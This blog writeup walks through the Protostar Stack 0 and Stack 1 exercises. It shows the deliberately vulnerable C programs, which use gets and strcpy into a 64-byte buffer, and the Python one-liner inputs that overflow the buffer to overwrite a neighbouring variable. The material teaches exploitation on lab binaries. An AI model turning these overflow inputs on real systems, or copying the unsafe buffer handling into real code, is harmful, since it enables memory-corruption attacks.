--- title: "Protostar Exploit Exercises Solutions 0-1" layout: post category: writeup tags: [exploit-exercises, protostar, hacking] excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com" --- # Stack 0 Here's what we're given: ``` #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } } ``` The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable. I'm guessing if I put in a string longer than 64 bytes it will work. Let's see: ``` $ echo `python -c 'print "A"*64'` | ./stack0 Try again? ``` That works as expected, now with 65 bytes: ``` $ echo `python -c 'print "A"*65'` | ./stack0 you have changed the 'modified' variable ``` Solved! # Stack 1 Here's the code we're given: ``` #include #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } } ``` Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before. Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order: ``` $ ./stack1 `python -c 'print "A"*64'` Try again, you got 0x00000000 ``` That works as expected, now with the additional bytes: ``` $ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'` you have correctly got the variable to the right value ``` Woo!